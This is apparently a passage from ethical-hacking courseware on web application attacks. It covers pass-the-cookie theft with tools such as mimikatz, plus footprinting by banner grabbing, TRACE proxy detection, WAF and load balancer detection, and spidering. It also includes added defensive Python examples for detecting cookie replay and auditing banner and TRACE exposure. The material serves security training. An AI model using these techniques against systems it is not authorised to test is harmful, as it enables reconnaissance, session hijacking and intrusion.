■ The pass-the-cookie attack occurs when attackers obtain a clone of a cookie from the user's browser and use the cookie to establish a session with the target web server


Pass-the-Cookie Attack
Pass-the-cookie attacks allow attackers to access a user's web services without providing any identity or performing multi-factor authentication. A pass-the-cookie attack occurs when attackers obtain a clone of a cookie from the user's browser and use the cookie to establish a session with the target web server. If attackers can retrieve appropriate cookies, they may log in as a valid entity to previously accessed web services, evading all the authentication checkpoints. Attackers may also use a specifically developed program or a phishing attack to obtain these cookies.
For example, Mozilla Firefox saves all cookies inside a local SQLite database that attackers may acquire using tools such as firefox_creds. If the captured cookie is a session cookie, the attacker can use malware to implant their own session while browsing the web application. Attackers can also use mimikatz to extract encrypted cookies.
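One server-side mitigation that follows from the attack described above is to bind a session to the client context that created it and to treat the same cookie arriving from a different context as a probable replay. The following Python is an added example, not EC-Council's code; the session store, the client attributes used for the fingerprint, the 15-minute lifetime and the sample requests are all constructed.

```python
"""Detect a replayed session cookie (pass-the-cookie) on the server side.

Added example, not EC-Council's code. Sessions are bound to the client
context seen at login; a cookie that reappears from a different context is
revoked and logged instead of being honoured. All inputs are constructed.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

SESSION_TTL = 15 * 60  # absolute lifetime (seconds); a short lifetime shrinks the replay window
SERVER_KEY = b"constructed-server-key"  # load from a secret store in a real deployment


@dataclass
class Session:
    user: str
    context_hash: str  # keyed hash of the client context at login
    created: float


def context_fingerprint(client_ip: str, user_agent: str) -> str:
    """Keyed hash of coarse client attributes. A cookie copied into the attacker's
    browser normally arrives with a different address and User-Agent. Address
    changes (mobile clients, VPNs) make this a risk signal, not proof of theft."""
    material = f"{client_ip}|{user_agent}".encode()
    return hmac.new(SERVER_KEY, material, hashlib.sha256).hexdigest()


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self.sessions: Dict[str, Session] = {}
        self.alerts: List[str] = []  # what a SIEM would ingest
        self.clock = clock

    def login(self, user: str, client_ip: str, user_agent: str) -> str:
        """Issue a fresh, unguessable session id after a successful (MFA-backed) login."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = Session(user, context_fingerprint(client_ip, user_agent), self.clock())
        return sid

    def authenticate(self, sid: str, client_ip: str, user_agent: str) -> Tuple[Optional[str], str]:
        """Resolve a presented cookie to (user, 'ok') or (None, reason).
        A context mismatch revokes the session, so the holder of a stolen
        cookie is sent back through login and MFA rather than served."""
        session = self.sessions.get(sid)
        if session is None:
            return None, "unknown"
        if self.clock() - session.created > SESSION_TTL:
            del self.sessions[sid]
            return None, "expired"
        presented = context_fingerprint(client_ip, user_agent)
        if not hmac.compare_digest(presented, session.context_hash):
            self.alerts.append(
                f"possible pass-the-cookie: session of {session.user} presented from {client_ip}")
            del self.sessions[sid]
            return None, "replay"
        return session.user, "ok"

    def logout(self, sid: str) -> None:
        """Logout must invalidate server-side state; clearing the browser cookie
        alone leaves a stolen copy usable until it expires."""
        self.sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Attributes that limit how the cookie can be taken and where it travels:
    HttpOnly blocks script access, Secure keeps it off plaintext HTTP, SameSite=Strict
    stops cross-site sends, and the __Host- prefix forbids a Domain attribute."""
    return f"__Host-sid={sid}; Path=/; Secure; HttpOnly; SameSite=Strict; Max-Age={SESSION_TTL}"


if __name__ == "__main__":
    store = SessionStore()
    ua = "Mozilla/5.0 (Windows NT 10.0) Firefox/100.0"
    sid = store.login("alice", "203.0.113.10", ua)
    print(set_cookie_header(sid))
    print(store.authenticate(sid, "203.0.113.10", ua))
    # The same cookie value injected into a different browser elsewhere (the attack).
    print(store.authenticate(sid, "198.51.100.7", "Mozilla/5.0 (X11; Linux x86_64) Chrome/101.0"))
    print(store.alerts)
```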


Figure 14.43: Illustration of a pass-the-cookie attack (1. a session cookie is generated in the browser when the user logs into a web service; 2. the attacker steals the cookie using specially designed malware; 3. the attacker injects the cookie into their browser session to access the victim's web services)


LO#03: Explain Web Application Hacking Methodology


Web Application Hacking Methodology


The previous section discussed the security posture of web applications by analyzing various types of threats/attacks currently in use. Attackers perform these attacks using a detailed process called the hacking methodology. This section will describe the steps of the hacking methodology, explaining how attackers target web applications.


Attackers use the web application hacking methodology to gain knowledge of a particular web
application to compromise it successfully. This methodology allows them to plan each step in
detail to increase their chances of successfully hacking the application. Under this methodology,
they do the following to collect detailed information about various resources needed to run or
access the web application:

• Footprint web infrastructure
• Analyze web applications
• Bypass client-side controls
• Attack authentication mechanisms
• Attack authorization schemes
• Attack access controls
• Attack session management mechanisms
• Perform injection attacks
• Attack application logic flaws
• Attack shared environments
• Attack database connectivity
• Attack web application clients
• Attack web services
If hackers do not use this process and try to exploit the web application directly, their chances of failure increase. The following phases of this module will provide a detailed explanation of how attackers derive information about these resources.


Footprint Web Infrastructure
Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications.
■ Server Discovery: Discover the physical servers that host web applications
■ Service Discovery: Discover the services running on web servers that can be exploited as attack paths for web app hacking
■ Server Identification: Grab server banners to identify the make and version of the web server software
■ Hidden Content Discovery: Extract content and functionality that is not directly linked or reachable from the main visible content
■ Load Balancers Detection: Detect load balancers along with their real IP addresses

Footprint Web Infrastructure: Server Discovery
Server discovery gives information about server locations and ensures that the target server is live on the Internet.
■ Whois Lookup: Whois lookup utilities provide information about the IP address of the web server and DNS names.
Whois Lookup Tools: Netcraft (https://www.netcraft.com), WHOIS Lookup (https://whois.domaintools.com), SmartWhois (https://www.tamos.com), Batch IP Converter (http://www.sabsoft.com)
■ DNS Interrogation: DNS interrogation provides information about the locations and types of servers.
DNS Interrogation Tools: DNSRecon (https://github.com), Domain Dossier (https://centralops.net), DNS Records (https://network-tools.com), DNSdumpster.com (https://dnsdumpster.com)
■ Port Scanning: Port scanning attempts to connect to a particular set of TCP or UDP ports to discover services that exist on the server.
Port Scanning Tools: Nmap (https://nmap.org), NetScanTools Pro (https://www.netscantools.com), Advanced Port Scanner (https://www.advanced-port-scanner.com), Hping (http://www.hping.org)
Note: For complete coverage of Whois lookup, DNS interrogation, and port scanning, refer to Module 02: Footprinting and Reconnaissance as well as Module 03: Scanning Networks.


Footprint Web Infrastructure: Service Discovery
■ Scan the target web server to identify common ports that web servers use for different services
■ You can use tools such as Nmap, NetScanTools Pro, and Sandcat Browser for discovering services
■ Identified services act as attack paths for web application hacking


Footprint Web Infrastructure: Server Identification/Banner Grabbing
■ Analyze the server response header field to identify the make, model, and version of the web server software
■ Syntax: C:\telnet <Website domain or IP address> 80
■ Run command s_client -host <target website> -port 443
■ Type GET / HTTP/1.0 and press Enter to get the server information



Footprint Web Infrastructure: Detecting Web App Firewalls and Proxies on Target Site
Detecting Proxies
■ Determine whether your target site is routing your requests through any proxy servers
■ Proxy servers generally add certain headers in the response header field: "Via:", "X-Forwarded-For:", "Proxy-Connection:"
■ Use the HTTP/1.1 TRACE method to identify any changes that a proxy server made to the request
Detecting Web Application Firewalls
■ Determine whether your target site is running a web app firewall in front of a web application
■ Check the cookies response to your request because most of the WAFs add their own cookie in the response
■ Use WAF detection tools such as WAFW00F to find which WAF is running in front of the application



Footprint Web Infrastructure: Hidden Content Discovery
■ Discover any hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application
■ This allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc.
Web Spidering/Crawling
■ Web spiders/crawlers automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses
■ Attackers use tools such as OWASP Zed Attack Proxy, Burp Suite, WebScarab, and Mozenda Web Agent Builder for web spidering/crawling
Attacker-Directed Spidering
■ The attacker accesses all functionality of an application and uses an intercepting proxy such as OWASP Zed Attack Proxy to monitor all requests and responses
■ The intercepting proxy parses all application responses and reports the content and functionality it discovers
(Screenshot: OWASP Zed Attack Proxy, https://www.zaproxy.org)


Footprint Web Infrastructure: Detect Load Balancers
■ Organizations use load balancers to distribute web server load on multiple servers and increase the productivity and reliability of web applications
■ Attackers use various tools such as dig, load balancing detector (lbd), and Halberd to detect load balancers and their real IP addresses
(Screenshot: load balancing detector (lbd))

Footprint Web Infrastructure
Footprinting is the process of gathering complete information about a system and all its related components, as well as how they work. The web infrastructure of a web application is the arrangement by which it connects to other systems, servers, and so on in the network. Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Attackers footprint the web infrastructure to know how the web application connects with its peers and the technologies it uses and to find vulnerabilities in specific parts of the web application architecture. These vulnerabilities can help attackers exploit and gain unauthorized access to the web application.
Footprinting the web infrastructure allows an attacker to engage in the following tasks:
■ Server Discovery: Attackers attempt to discover the physical servers that host web applications, using techniques such as Whois lookup, DNS interrogation, port scanning, and so on.
■ Service Discovery: Attackers can discover the services running on web servers to determine whether they can use some of them as attack paths for hacking the web application. This procedure also provides web application information such as storage location, information about the machines running the services, and the network usage and protocols involved. Attackers can use tools such as Nmap, NetScanTools Pro, and others to find services running on open ports and exploit them.
■ Server Identification: Attackers use banner grabbing to obtain the server banners, which help to identify the make and version of the web server software. Other information that this technique provides includes the following:
o Local Identity: information such as the location of the server and the Origin-Host.


o Local Addresses: the local IP addresses that the server uses for sending Diameter
Capability Exchange messages (CER/CEA messages), including the server identity,
capabilities, and other information such as protocol version number and supported
Diameter applications.
o Self-Names: this field specifies all the realms that the server considers as local and
treats all the requests sent for them as no realm requests.
■ Hidden Content Discovery: Footprinting also allows attackers to extract content and
functionality that is not directly linked to or reachable from the main visible content.
■ Load Balancers Detection: Attackers can detect load balancers of the target
organization along with their real IP addresses to identify servers exposed over the
Internet.
Server Discovery
To footprint a web infrastructure, first, you need to discover active Internet servers. Three techniques, namely Whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
■ Whois Lookup
Whois lookup tools allow you to gather information about a domain with the help of DNS and Whois queries. They provide information about the IP address of the web server and DNS names. These tools produce results in the form of an HTML report.
Use the following tools to perform Whois lookup:
o Netcraft (https://www.netcraft.com)
o WHOIS Lookup (https://whois.domaintools.com)
o SmartWhois (https://www.tamos.com)
o Batch IP Converter (http://www.sabsoft.com)
■ DNS Interrogation
DNS interrogation queries the DNS, a distributed database that organizations use to connect their IP addresses with their respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching an attack on a target organization. It provides information about the location and type of servers.
Use the following tools to perform DNS interrogation:
o DNS Records (https://network-tools.com)
o DNSRecon (https://github.com)
o Domain Dossier (https://centralops.net)
o DNSdumpster.com (https://dnsdumpster.com)


■ Port Scanning
Port scanning is the process of scanning system ports to recognize open ones. It
attempts to connect to a particular set of TCP or UDP ports to find out the service that
exists on the server. If attackers recognize an unused open port, they can exploit it to
intrude into the system.
Use the following tools to perform port scanning:
o Nmap (https://nmap.org)
o NetScanTools Pro (https://www.netscantools.com)
o Advanced Port Scanner (https://www.advanced-port-scanner.com)
o Hping (http://www.hping.org)
Note: For complete coverage of Whois lookup, DNS interrogation, and port scanning, refer to
Module 02: Footprinting and Reconnaissance as well as Module 03: Scanning Networks.

Service Discovery

Footprinting the web infrastructure provides data about the services offered, such as exchange
and encryption of data, path of transmission, and protocols deployed. Scan the target web
server to identify the common ports that it uses for different services. After finding these
services, attackers can compromise them to exploit the web infrastructure that runs the
application. The identified services act as attack paths for web application hacking. The table
below lists common ports used by web servers and their respective HTTP services:

Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
384     Remote Network Server System
443     SSL (HTTPS)
514     Remote Shell
625     Open Directory Proxy (ODProxy)
657     IBM RMC (Remote Monitoring and Control) Protocol
706     Secure Internet Live Conferencing (SILC)
832     NETCONF for SOAP over HTTPS
833     NETCONF for SOAP over BEEP
900     IBM WebSphere administration client
981     Remote HTTPS management for firewall devices running embedded Check Point VPN-1 software
987     Microsoft Remote Web Workplace, a feature of Windows Small Business Server


1433    MSSQL Server
1434    MSSQL Monitor
1527    Oracle Net Services
2301    Compaq Insight Manager
2381    Compaq Insight Manager over SSL
2638    SQL Anywhere Database Server
4242    Microsoft Application Center Remote management
7001    BEA WebLogic
7002    BEA WebLogic over SSL
7070    Sun Java Web Server over SSL
8000    Alternate web server or web cache
8001    Alternate web server or management
8005    Apache Tomcat
9090    Sun Java Web Server admin module
10000   Netscape Administrator interface

Table 14.1: Table displaying HTTP Services

■ Tools used for service discovery
o Nmap
Source: https://nmap.org
Nmap is a multi-platform, multi-purpose application used to perform footprinting of ports, services, operating systems, etc. It is used for network discovery and security auditing. It is useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Figure 14.44: Screenshot of Nmap (Zenmap running nmap -T4 -A -v -PE -PS -PA 22,25,80,3389 google.com; the Ports/Hosts tab lists 80/tcp open http gws, 113/tcp closed ident, 443/tcp open https gws, 2000/tcp open cisco-sccp, and 5060/tcp open sip)


Some additional service discovery tools are as follows:
o NetScanTools Pro (https://www.netscantools.com)
o Sandcat Browser (https://www.syhunt.com)
Server Identification/Banner Grabbing
Banner grabbing is a footprinting technique used by a hacker to obtain sensitive information about a target. An attacker establishes a connection with the target and sends a pseudo-request to it. The target then replies to the request with a banner message that contains sensitive information required by the attacker to further penetrate the target.
Through banner grabbing, attackers identify the name and/or version of a server, operating system, or application. They analyze the server response header field to identify the make, model, and version of the web server software. This information helps them to select the appropriate exploits from vulnerability databases to attack the web server and its applications.
How an attacker can use telnet to establish a connection and gain banner information of a target is demonstrated below:
• The attacker issues the command telnet moviescope.com 80 in his/her machine's command prompt to establish a telnet connection with the target machine.
Note: The attacker can specify either the IP address of a target machine or the URL of a website. In both cases, the attacker obtains banner information of the target. In other words, if the attacker enters an IP address, he/she receives banner information of the target machine; if he/she enters the URL of a website, he/she receives banner information of the web server that hosts the website.
Syntax: C:\telnet <Website domain or IP address> 80

Figure 14.45: An example of telnet command usage

• After establishing the connection, the attacker receives a blank prompt that does not display any information.
• Now, the attacker will press the Esc key, which returns the banner message that displays information about the target server along with some miscellaneous information.


Figure 14.46: Result of telnet banner grabbing (the response headers identify the server as Microsoft-IIS/10.0 and show X-Powered-By: ASP.NET)

■ This information helps attackers find ways to exploit target web servers and their applications.
o Grabbing Banners from SSL Services
Tools such as Telnet and Netcat are capable of grabbing banners of web servers over only an HTTP connection. Attackers cannot grab banners over an SSL connection using the same techniques as those used for grabbing banners over HTTP connections. They can use tools such as OpenSSL to grab banners on web servers over an encrypted (HTTPS/SSL) connection.
Attackers perform the following steps to grab banners over an SSL connection:
o Step 1: Install OpenSSL
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) network protocols and the related cryptography standards required by them. It is available at https://www.openssl.org.
o Step 2: Navigate to OpenSSL in the terminal
o Step 3: Run the command: s_client -host <target website> -port 443. Replace the <target website> with your target's domain name. Here, 443 is the default SSL port.

Figure 14.47: Example of OpenSSL command


o Step 4: Type GET / HTTP/1.0 and press Enter to get the server information.
The information displayed indicates that OpenSSL identifies the server used by certifiedhacker.com as Apache.

Figure 14.48: Result of OpenSSL banner grabbing

Some additional banner grabbing tools are as follows:
■ Netcat (http://netcat.sourceforge.net)
■ ID Serve (https://www.grc.com)
■ Netcraft (https://www.netcraft.com)
Detecting Web App Firewalls and Proxies on Target Site

While footprinting the web infrastructure, attackers must discover the web application firewall
and proxy settings of the target site to know the security measures employed.
■ Detecting Proxies
Some organizations use proxy servers in front of their web servers to make them untraceable. Therefore, when attackers try to trace the target's IP address, which is hidden behind a proxy, using footprinting techniques, the attempt would return the proxy's IP address and not the server's legitimate address.
Determine whether your target site is routing your requests through proxy servers. To know whether a web server is behind a proxy, attackers can use the TRACE method. TRACE sends a request to the web server, asking it to echo the request back. Attackers issue the TRACE request over HTTP/1.1. If the web server is behind a proxy server, the proxy modifies the TRACE request (by adding some headers) and forwards it to the target web server. Therefore, when the web server bounces the request back to the attacker's machine, the attacker compares both requests and analyzes the changes made to it by the proxy server.


"Via:", "X-Forwarded-For:", "Proxy-Connection:"

TRACE / HTTP/1.1
Host: www.test.com

HTTP/1.1 300 OK
Server: Microsoft-IIS/10.0
Date: Sat, 23 Apr 2022 15:25:15 GMT
Content-Length: 40

TRACE / HTTP/1.1
Host: www.test.com
Via: 1.1 192.168.11.15

Figure 14.49: Result of TRACE command
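The banner-grabbing steps and the TRACE comparison above both amount to reading raw HTTP messages. The following Python is an added example, not EC-Council's code: one header parser drives two defender-side checks, an audit of what a banner grab of your own server would disclose, and a comparison of a sent TRACE request with the copy the server echoes back. The sample messages are constructed from the values the figures show (Microsoft-IIS/10.0, ASP.NET, Via: 1.1 192.168.11.15), and www.test.com is the text's placeholder host.

```python
"""Parse raw HTTP messages for two checks a defender runs against their own
servers: what a banner grab discloses, and whether TRACE echoes proxy-added headers.

Added example, not EC-Council's code. Sample messages are constructed from the
values shown in the text's figures; www.test.com is the text's placeholder host.
"""
import re
from typing import Dict, List, Tuple

# Headers whose value hands over the server make and, often, its exact version.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
# Headers that intermediaries insert; the text lists the first three.
PROXY_HEADERS = ("via", "x-forwarded-for", "proxy-connection", "x-forwarded-host")


def parse_message(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP request or response into (start line, headers, body).
    Header names are lower-cased; repeated names are joined with ', '."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate junk lines in a hand-captured dump
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return lines[0], headers, body


def banner_disclosures(raw_response: str) -> List[str]:
    """Findings for the information a telnet/openssl banner grab harvests.
    A header naming the product is a 'product' finding; one containing digits
    (a version) is a 'version' finding, the more useful of the two to an
    attacker selecting exploits from a vulnerability database."""
    _, headers, _ = parse_message(raw_response)
    findings = []
    for name in DISCLOSURE_HEADERS:
        value = headers.get(name, "")
        if value:
            kind = "version" if re.search(r"\d", value) else "product"
            findings.append(f"{name} discloses {kind}: {value}")
    return findings


def trace_findings(sent_request: str, raw_response: str) -> Dict[str, object]:
    """Compare the TRACE request we sent with the copy in the response body.
    An echoed request means TRACE is enabled (it should be disabled on
    production servers); headers present only in the echo were added in transit."""
    _, sent_headers, _ = parse_message(sent_request)
    _, _, body = parse_message(raw_response)
    echoed = body.strip()
    enabled = echoed.startswith("TRACE ")
    added: Dict[str, str] = {}
    if enabled:
        _, echoed_headers, _ = parse_message(echoed)
        added = {n: v for n, v in echoed_headers.items() if n not in sent_headers}
    return {
        "trace_enabled": enabled,
        "added_headers": added,
        "proxy_indicators": [n for n in added if n in PROXY_HEADERS],
    }


# Constructed from Figure 14.46: the response a plain GET / HTTP/1.0 produced.
BANNER_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Accept-Ranges: bytes\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Date: Tue, 19 Apr 2022 05:30:24 GMT\r\n"
    "Connection: close\r\n"
    "Content-Length: 783\r\n"
    "\r\n"
)
# Constructed: the same server after the identifying headers are removed.
HARDENED_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 783\r\n\r\n"

# Constructed from Figure 14.49: a TRACE whose echo carries a proxy-added Via header.
TRACE_REQUEST = "TRACE / HTTP/1.1\r\nHost: www.test.com\r\n\r\n"
TRACE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Date: Sat, 23 Apr 2022 15:25:15 GMT\r\n"
    "Content-Type: message/http\r\n"
    "\r\n"
    "TRACE / HTTP/1.1\r\n"
    "Host: www.test.com\r\n"
    "Via: 1.1 192.168.11.15\r\n"
    "\r\n"
)
# Constructed: the answer expected from a server with TRACE disabled.
TRACE_DISABLED = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n"

if __name__ == "__main__":
    print(banner_disclosures(BANNER_RESPONSE))
    print(banner_disclosures(HARDENED_RESPONSE))
    print(trace_findings(TRACE_REQUEST, TRACE_RESPONSE))
    print(trace_findings(TRACE_REQUEST, TRACE_DISABLED))
```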

■ Detecting Web Application Firewalls
Web application firewalls (WAFs) are security devices deployed between the client and the server. These devices are like an IPS that provides security for web applications against a wide range of attacks. They monitor web server traffic and block malicious traffic, thus safeguarding web applications from attacks.
Attackers use different techniques to detect web application firewalls in the web infrastructure. One of these techniques involves examining the cookies because a few WAFs add their own cookies during client-server communication. Attackers can view the HTTP request cookie to observe the presence of a WAF.
Another method for detecting a WAF is by analyzing the HTTP header request. Most firewalls edit HTTP header requests; thus, the server response varies. Hence, an attacker sends a request to a web server, and when the server responds to the request, the response betrays the presence of the web application firewall.
Attackers use various tools such as WAFW00F to detect the presence of a WAF in front of a web server that hosts the target website.
o WAFW00F
Source: https://github.com
WAFW00F allows one to identify and fingerprint WAFs protecting a website. It detects a WAF at any domain by looking for the following:
• Cookies
• Server cloaking
• Response codes
• Drop action
• Pre-built-in rules


Figure 14.50: Screenshot of WAFW00F

You can also use the tools listed below to detect WAFs in the target web infrastructure:
o SHIELDFY Web Application Firewall Detector (https://shieldfy.io)
o WhatWaf (https://github.com)
o Nmap (https://nmap.org)
Hidden Content Discovery

Hidden content and functionality not reachable from the main visible content can be
discovered to exploit user privileges within the application. This allows an attacker to recover
backup copies of live files, configuration files, and log files containing sensitive data, backup
archives containing snapshots of files within the web root, new functionality that is not linked
to the main application, etc.
The following methods are employed for discovering the hidden content:
• Web Spidering/Crawling

Web spiders/crawlers automatically discover the hidden content and funct ionality by
parsing HTML forms and client-side JavaScript requests and respon ses.
o OWASP Zed Attack Proxy

Source: https://www.zaproxy.org
OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding
vulnerabilities in web applications. It offers automated scanners as well as a set of
tools that allow you to find security vulnerabilities manually. Attackers use OWASP
ZAP for web spidering/crawling to identify hidden content and functionality in the
target web application.

Figure 14.51: Screenshot of OWASP ZAP (Automated Scan of http://www.moviescope.com; the Alerts pane lists SQL Injection, Viewstate without MAC Signature, X-Frame-Options Header Not Set, Absence of Anti-CSRF Tokens, Server Leaks Information via "X-Powered-By", X-AspNet-Version Response Header, X-Content-Type-Options Header Missing, and Information Disclosure - Suspicious Comments)

Some additional web spidering/crawling tools are as follows:


o Burp Suite (https://portswigger.net)
o WebScarab (https://owasp.org)
o Mozenda Web Agent Builder (https://www.mozenda.com)
o Octoparse (https://www.octoparse.com)
o Giant Web Crawl (https://80legs.com)
■ Attacker-Directed Spidering

The attacker accesses all of the application's functionality and uses an intercepting
proxy to monitor all requests and responses. The intercepting proxy parses all of the
application's responses and reports the content and functionality it discovers.
Attacker-directed spidering tools:
o OWASP Zed Attack Proxy (https://www.zaproxy.org)


Detect Load Balancers

Organizations use load balancers to distribute their web server load across multiple servers and
thus increase the productivity and reliability of web applications. In general, there are two
types of load balancers, namely DNS load balancers (layer 4 load balancers) and HTTP load
balancers (layer 7 load balancers) . Attackers use various tools such as dig, load balancing
detector (lbd), and Halberd, to detect load balancers of the target organization along with their
real IP addresses. For example, if a single host resolves to multiple IP addresses, then attackers
can determine that the target organization is using load balancers.
• Using host command

Type the following host command to determine whether the target domain is resolving
to multiple IP addresses:
host <target domain>

Figure 14.52: Screenshot showing output of host command


■ Using dig command


The dig command provides more detailed results than the host command. Type the
following dig command to determine whether the target domain is resolving to multiple
IP addresses:
dig <target domain>

Figure 14.53: Screenshot showing the output of dig command


■ Using load balancing detector (lbd)


Source: https://github.com
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP load
balancing via Server: and Date: header and diffs between server answers. It analyzes
data received from application responses to detect load balancers.
Type the following command to detect load balancers of the target web application:
lbd <target domain>

Figure 14.54: Screenshot showing the output of lbd tool

After identifying the real IP addresses behind the load balancers, attackers perform further
attacks on the target organization.
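The host/dig and lbd checks described above, as an added example that is not part of the courseware or of lbd: the DNS test is the multiple-A-record rule, and the HTTP test is the Server:/Date: comparison across repeated responses, run over constructed records and headers so that it works offline.

```python
from datetime import datetime
from email.utils import parsedate_to_datetime
from typing import Dict, List


def dns_load_balancing(a_records: List[str]) -> bool:
    """DNS load balancing: the same hostname resolving to more than one address.

    ``a_records`` is what `host` or `dig` print; a live run would pass
    socket.gethostbyname_ex(name)[2] instead of the constructed list below."""
    return len(set(a_records)) > 1


def http_load_balancing(responses: List[Dict[str, str]], max_skew_s: int = 2) -> List[str]:
    """HTTP load balancing indicators in the style of lbd: differing Server:
    banners, or Date: clocks that disagree by more than the capture interval,
    across responses to identical requests sent in quick succession."""
    reasons: List[str] = []
    servers = {r.get("Server", "<none>") for r in responses}
    if len(servers) > 1:
        reasons.append("Server header varies: " + ", ".join(sorted(servers)))
    # Compare every Date: header with the first one; a farm whose members keep
    # unsynchronised clocks shows jumps far larger than the seconds between captures.
    dates: List[datetime] = [parsedate_to_datetime(r["Date"]) for r in responses if "Date" in r]
    for i, stamp in enumerate(dates[1:], start=1):
        skew = abs((stamp - dates[0]).total_seconds())
        if skew > max_skew_s:
            reasons.append(f"Date header skew of {int(skew)}s between response 0 and response {i}")
            break
    return reasons


# Constructed sample (203.0.113.0/24 is a documentation range): the name resolves to
# two addresses, and the third of three back-to-back responses comes from a member
# running a different banner with a clock that is minutes ahead.
A_RECORDS = ["203.0.113.10", "203.0.113.11", "203.0.113.10"]
RESPONSES = [
    {"Server": "Apache/2.4.52", "Date": "Tue, 19 Apr 2022 02:31:09 GMT"},
    {"Server": "Apache/2.4.52", "Date": "Tue, 19 Apr 2022 02:31:10 GMT"},
    {"Server": "nginx/1.19.10", "Date": "Tue, 19 Apr 2022 02:33:42 GMT"},
]
```

A farm whose members share one banner and keep NTP-synchronised clocks returns an empty list here, which is the condition a defender wants to verify.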


Analyze Web Applications

Analyze the active application's functionality and technologies to identify exposed attack surfaces:

■ Identify Entry Points for User Input: Review the generated HTTP request to identify the user input entry points
■ Identify Server-Side Technologies: Fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting
■ Identify Server-Side Functionality: Observe the applications revealed to the client to identify the server-side structure and functionality
■ Identify Files and Directories: Identify misconfigured web applications that expose critical files and directories over the Internet
■ Identify Web Application Vulnerabilities: Identify exploitable vulnerabilities in the underlying web technologies
■ Map the Attack Surface: Identify the various attack surfaces uncovered by the applications and their associated vulnerabilities

Analyze Web Applications: Identify Entry Points for User Input

■ Examine URL, HTTP header, query string parameters, POST data, and cookies to determine all user input fields
■ Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers
■ Determine URL encoding techniques and other encryption measures implemented for secure web traffic such as SSL

Tools used:
o Burp Suite (https://portswigger.net)
o WebScarab (https://owasp.org)
o OWASP Zed Attack Proxy (https://www.zaproxy.org)
o httprint (https://www.net-square.com)

Analyze Web Applications: Identify Server-Side Technologies

■ Perform detailed server fingerprinting, and analyze HTTP headers and HTML source code to identify server-side technologies
■ Examine URLs for file extensions, directories, and other identification information
■ Examine the error page messages
■ Examine session tokens: JSESSIONID - Java, ASPSESSIONID - IIS server, ASP.NET_SessionId - ASP.NET, PHPSESSID - PHP
■ Use tools such as httprint and WhatWeb to identify server-side technologies

(Slide figures: httprint output, https://www.net-square.com, and an ASP.NET "Server Error in '/ReportServer' Application" error page reporting Microsoft .Net Framework Version 4.0.30319; ASP.Net Version 4.0.30319.1)

Analyze Web Applications: Identify Server-Side Functionality

■ Examine page source information and URLs and make an educated guess to determine the internal structure and functionality of web applications

Tools used:
o GNU Wget (https://www.gnu.org)
o curl (https://curl.se)
o BlackWidow (http://softbytelabs.com)

Examine URL:
https://www.certifiedhacker.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2020&endDate=20%2F04%2F2022&showBy=name
(https indicates SSL, .aspx indicates the ASPX platform, and showBy=name points to a database column)

Analyze Web Applications: Identify Files and Directories

Attackers use tools such as Gobuster or the Nmap NSE script http-enum to enumerate applications, as well as
hidden directories and files of the web application hosted on the web server, that are exposed on the
Internet

Analyze Web Applications: Identify Web Application Vulnerabilities

■ Attackers use various techniques to detect vulnerabilities in target web applications hosted on web servers either to gain administrator-level access to the server or to retrieve sensitive information stored on the server
■ Comprehensive vulnerability scanning can disclose security flaws associated with executables, binaries, and technologies used in a web application
■ Attackers can use tools such as Vega to identify the vulnerabilities of target web applications

Vega (https://www.subgraph.com) helps you to find and validate SQL injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities

Web Application Scanning Tools:
o WPScan Vulnerability Database (https://wpscan.com)
o Arachni (https://www.arachni-scanner.com)
o appspider (https://www.rapid7.com)
o Uniscan (https://sourceforge.net)

Analyze Web Applications: Map the Attack Surface

Information | Attack
Client-Side Validation | Injection Attack, Authentication Attack
Database Interaction | SQL Injection, Data Leakage
File Upload and Download | Directory Traversal
Display of User-Supplied Data | Cross-Site Scripting
Dynamic Redirects | Redirection, Header Injection
Login | Username Enumeration, Password Brute-Force
Session State | Session Hijacking, Session Fixation
Injection Attack | Privilege Escalation, Access Controls
Cleartext Communication | Data Theft, Session Hijacking
Error Message | Information Leakage
Email Interaction | Email Injection
Application Code | Buffer Overflows
Third-Party Application | Known Vulnerabilities Exploitation
Web Server Software | Known Vulnerabilities Exploitation

Analyze Web Applications


Once attackers have attempted various possible attacks on a vulnerable web server, they may
turn their attention to the web application itself. To hack the web application, first, they may
need to analyze it to determine its vulnerable areas. Even if it has only a single vulnerability,
attackers try to compromise its security by launching an appropriate attack. This section
